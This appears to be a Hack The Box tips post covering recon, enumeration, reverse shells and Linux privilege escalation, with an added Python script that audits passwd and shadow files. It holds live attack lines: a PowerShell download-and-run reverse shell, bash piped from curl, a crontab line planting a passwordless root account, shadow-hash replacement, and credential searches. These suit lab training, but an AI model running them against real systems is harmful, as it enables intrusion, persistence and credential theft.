This post was created because there seem to be a lot of common questions in the HtB Discord and Forums. The tips below are jumping-off points for doing additional research into these tools and their capabilities.
Reconnaissance
We need to gather information about the target.
Nmap
Nmap scan for open ports and corresponding services.
nmap -A -sV -T4 -vvv TARGET -oN the_box_name.txt
-A: Enables OS detection, version detection, script scanning, and traceroute.
-sV: Enables version detection, which attempts to identify the specific software version running on open ports.
-T4: Sets the timing template to level 4, which is aggressive and suitable for scanning smaller networks.
-vvv: Increases the verbosity level to 3, displaying detailed information about the scan progress.
-oN: Output scan to file. I like doing this so I don't have to waste time doing another scan or looking back through console history.
In actual penetration test scans, you may want to specify the --min-rate and/or --max-rate options to set minimum and maximum packets per second (pps) to avoid overwhelming the target or triggering intrusion detection systems (IDS).
Take note of versions of the services reported.
Typically you'll find something, and if it is a service on port 80, it's likely to be a hosted website. It's good to add this to your /etc/hosts file:
sudo -- sh -c -e "echo '10.10.11.1 box_name.htb' >> /etc/hosts";
or
echo '10.10.11.1 box_name.htb' | sudo tee -a /etc/hosts
Most of the time the URL is http://box_name.htb, but sometimes that's not the case and you want to look for any indications on the website, because it will aid you later in VHOST enumeration.
Enumeration
Page/Web-Content Enumeration
For any page/web-content enumeration we need some good wordlists, such as SecLists under the Discovery/Web-Content path, along with tools like FFuF (Fuzz Faster u Fools) and GoBuster to discover content. Use a wordlist based on clues about the type of web framework used, gathered from viewing the source of the site and the headers as well as page extensions (for example .aspx, .php, .jsp, etc).
Sometimes you may want to scrape keywords from the hosted sites with cewl to generate a targeted wordlist.
cewl http://box_name.htb -w your_generated_wordlist.txt
ffuf -u http://box_name.htb/FUZZ -w common.txt
Where FUZZ is the keyword that will be replaced with words from the passed-in wordlist for fuzzing.
It's good to use multiple tools since they may produce different results due to their detection logic and thresholds. Here is the equivalent command with GoBuster:
gobuster dir -u http://10.10.11.1/ -w common.txt -b 302
The -b 302 is there since we want to exclude 302 status codes. Look at the -x flag for extension options.
Also look at FeroxBuster as well:
feroxbuster -u http://10.10.11.23 -w common.txt
The FeroxBuster documentation has a good breakdown comparing these tools.
All three are typically faster than older discovery tools like dirbuster and wfuzz.
Sub-domain/Virtual Host Enumeration
In HtB machines, there usually aren't subdomains to enumerate, but VHosts serve the same purpose.
A subdomain is a domain that is part of a larger domain name. It is a way to organize and structure your website content. Subdomains can be used to create separate sections of a website, such as blog.example.com or store.example.com. Technically, subdomains are treated as separate domains by the Domain Name System (DNS), but they are still part of the parent domain.
A virtual host (VHOST), also known as a name-based virtual host or shared IP hosting, is a method of hosting multiple domain names on a single server using a single IP address. This is achieved by serving different websites based on the hostname requested by the client (e.g., browser). When a client requests a website, it includes the hostname in the HTTP request, allowing the server to determine which website to serve.
The main difference between virtual hosts and subdomains is that virtual hosts allow multiple domains to be hosted on a single server using a single IP address, while subdomains are used to create separate sections within a single domain. This makes sense for Hack The Box machines and the supporting infrastructure.
You will also need to use wordlists under /SecLists/Discovery/DNS for this:
ffuf -w subdomains-top1million-5000.txt -u http://10.10.11.1 -H "HOST: FUZZ.box_name.htb" -ac
The -ac flag (auto-calibrate-filtering-options) is great. It sends pre-flight checks before scanning starts and analyzes the responses for status code and content-length for filtering. This option makes it easier to use FFuF over GoBuster.
Update /etc/hosts with any new VHosts found:
sudo sed -i '$ d' /etc/hosts
echo '10.10.11.1 box.htb vhost1.box.htb' | sudo tee -a /etc/hosts
Robots.txt
The robots.txt file will help by showing you any files and folders that web crawlers/robots are told to stay out of. Lots of simpler CTFs and cyber-ranges will use this as a clue because it's realistic.
User-Agent: *
# Directories
Disallow: /admin/
Disallow: /documentation/
Disallow: /bin/
# Files
Disallow: /license.txt
Disallow: /README.txt
Disallow: /passwords.txt
Disallow: /database.bak
Nuclei
Use Nuclei to scan for vulnerabilities in all your discovered sites:
nuclei -u http://box_name.htb
Foothold
Look for anything from the enumeration and scans that tells you which frameworks and versions are being used. Google dorking and Exploit-DB/SearchSploit will then give you possible clues about vulnerabilities and exploits.
searchsploit afd windows local
See if you can find some way to get remote code execution, such as with a reverse shell. Once you have a remote shell, you can look around for any clues to get a full Secure Shell (SSH) session.
Set up a listener in one of your terminal sessions with the port specified in your reverse shell payload and the IP of your client (not the target), which you can find with ifconfig or ipconfig:
nc -nvlp 7001
Linux
Run the following to get a more featured shell:
python -c "import pty; pty.spawn('/bin/sh')"
or
python -c 'import pty; pty.spawn("/bin/bash")'
This spawns a new shell with the pty module with the same level of access as the current shell.
To add the clear command among others:
export TERM=xterm
To get tab autocomplete and arrow keys, background the process with CTRL + Z; you should be back in the original terminal session, then run:
stty raw -echo; fg
This turns off our terminal's echo and then resumes the last backgrounded process. Now we should also expect CTRL + C to work without exiting the session.
Windows
If it is a Windows machine and it has PowerShell, you can run a better reverse shell with https://github.com/antonioCoco/ConPtyShell
Example, assuming you are hosting an http.server on your client machine that the target can reach (see below):
powershell -nop -w hidden -c IEX(IWR http://CLIENT_IP:PORT/Invoke-ConPtyShell.ps1 -UseBasicParsing); Invoke-ConPtyShell [YOUR_CLIENT_IP] [YOUR_CLIENT_PORT]
Privilege Escalation
Tools like PEASS-ng/linPEAS.sh and GTFOBins will help you with privilege escalation, but you need to get them onto the target to run. To transfer files from your client to the target, you can spin up an HTTP server:
python3 -m http.server 5502
From the target machine where you have shell:
curl your_client_ip:port
In the real world, the payloads could be downloaded from the internet. They could be obfuscated with base64. Ideally, attackers will want to live off the land instead of bringing in additional tools. You may also be restricted in disk space or write permissions, so you can bypass this by running scripts directly from cURL:
bash <(curl -s http://your_web_server_ip:port/some_script.sh)
See if the user you currently have access to can run any sudo commands:
sudo -l
Credentials Search
We could also look for strings in all files. This command will search for the word password anywhere in files and print the matches in red:
grep --color=always -rnwi "PASSWORD" / 2> /dev/null
Or with locate:
locate password | less
Other options:
find / -name authorized_keys
find / -name id_rsa 2> /dev/null
find . -type f -exec grep -i -I "PASSWORD" {} /dev/null \;
Crontab
Look for any scripts that are called by cronjobs.
echo '* * * * * root /bin/bash -c "echo root2::0:0:root:/root:/bin/bash >> /etc/passwd"' | sudo tee -a /etc/crontab
SUID
Look for anything that can be executed in the context of the owner, like root:
find / -type f -perm -04000 -ls 2>/dev/null
Symlink
Sometimes you can gain access to restricted directories and files with symbolic links:
ln -s /root root
ln -s /etc/shadow shadow
Shadow File
If you have access to the /etc/shadow and /etc/passwd files you can try cracking the user passwords with Hashcat or John the Ripper, but you need to unshadow the files first:
unshadow passwd.txt shadow.txt > unshadowed.txt
You could also do this manually. This is the schema for the entries (the hash field is itself split by $ into algorithm id, salt and hash):
username:$hash_algo$salt$password_hash:last_changed:minimum_days_pwd_change:maximum_days_pwd_change:warn_expire_days:days_inactive:expiration_date
The hashing algorithm used is yescrypt, as denoted by $y in the entry, which a GPU will not have a good time cracking. John the Ripper will support it with:
john hashes.txt --format=crypt --wordlist=your_wordlist
It will be slow and may not even get cracked depending on your wordlist.
If you can alter the /etc/shadow file directly, write in either a known password hash for a known user or just allow an empty password:
root:$y$::19742:0:99999:7:::
A * or ! in the hash field denotes a locked account.
Here is a quick replacement. You can change the root password faster this way; remember to escape special characters with \:
root_hash="root\:\\\$y\\\$j9T\\\$VEMcaSLaOOvSE3mYgRXRv\/\\\$xMXYxTRyCAkwoSHhlyIoDS01clvPEp\/hh0r3MSClmL1\:19742\:0\:99999\:7\:\:\:"
known_hash="root\:\\\$y\\\$j9T\\\$RUjBgvOODKC9hyu5u7zCt0\\\$Gf8nqZ4umh3s1N69EeoQ4N5user6c2SlGb1LvBFRxFz\:19742\:0\:99999\:7\:\:\:"
sed -i "s|$root_hash|$known_hash|" shadow
Use su root to change to the root user.
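As an added example (not from the original post), here is a small Python audit that parses /etc/passwd and /etc/shadow lines using the schema above and flags what a defender should catch on a box: an extra UID 0 account like the root2 entry the crontab one-liner appends, empty password fields, locked accounts, and which crypt algorithm each hash uses. The sample lines are constructed for the demo, not taken from any real host.

```python
import re

# Constructed sample lines (not from any real host). The "root2" passwd line
# mirrors the entry the crontab one-liner above appends; "svc" has no hash.
PASSWD = """root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
alice:x:1000:1000:alice:/home/alice:/bin/bash
root2::0:0:root:/root:/bin/bash
"""
SHADOW = """root:$y$j9T$SALTSALTSALT$HASHHASHHASHHASH:19742:0:99999:7:::
daemon:*:19742:0:99999:7:::
alice:!$6$salt$hash:19742:0:99999:7:::
svc::19742:0:99999:7:::
"""

# crypt(3) id -> algorithm name; $y$ is the yescrypt id discussed above
ALGOS = {"1": "md5crypt", "5": "sha256crypt", "6": "sha512crypt", "y": "yescrypt"}

def classify_hash(field):
    """Describe a shadow password field: empty, locked, or which crypt id."""
    if field == "":
        return "empty"            # login with no password at all
    if field[0] in "*!":
        return "locked"           # * or ! prefix disables password login
    m = re.match(r"\$([^$]+)\$", field)
    return ALGOS.get(m.group(1), "unknown:" + m.group(1)) if m else "legacy-des"

def audit(passwd_text, shadow_text):
    """Return (username, finding) pairs a defender would want to review."""
    findings = []
    for line in passwd_text.splitlines():
        f = line.split(":")
        if len(f) != 7:           # passwd has exactly 7 fields
            continue
        name, pw, uid = f[0], f[1], f[2]
        if uid == "0" and name != "root":
            findings.append((name, "uid 0 account"))
        if pw == "":              # empty field here means no password check
            findings.append((name, "empty passwd field"))
    for line in shadow_text.splitlines():
        f = line.split(":")
        if len(f) != 9:           # shadow has exactly 9 fields (last is reserved)
            findings.append((f[0], "malformed shadow entry"))
            continue
        kind = classify_hash(f[1])
        if kind == "empty":
            findings.append((f[0], "empty shadow hash"))
        elif kind == "legacy-des" or kind.startswith("unknown"):
            findings.append((f[0], kind))
    return findings
```

Run audit(open("/etc/passwd").read(), open("/etc/shadow").read()) as root on a box you are cleaning up to see the same checks against the live files.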
GL-HF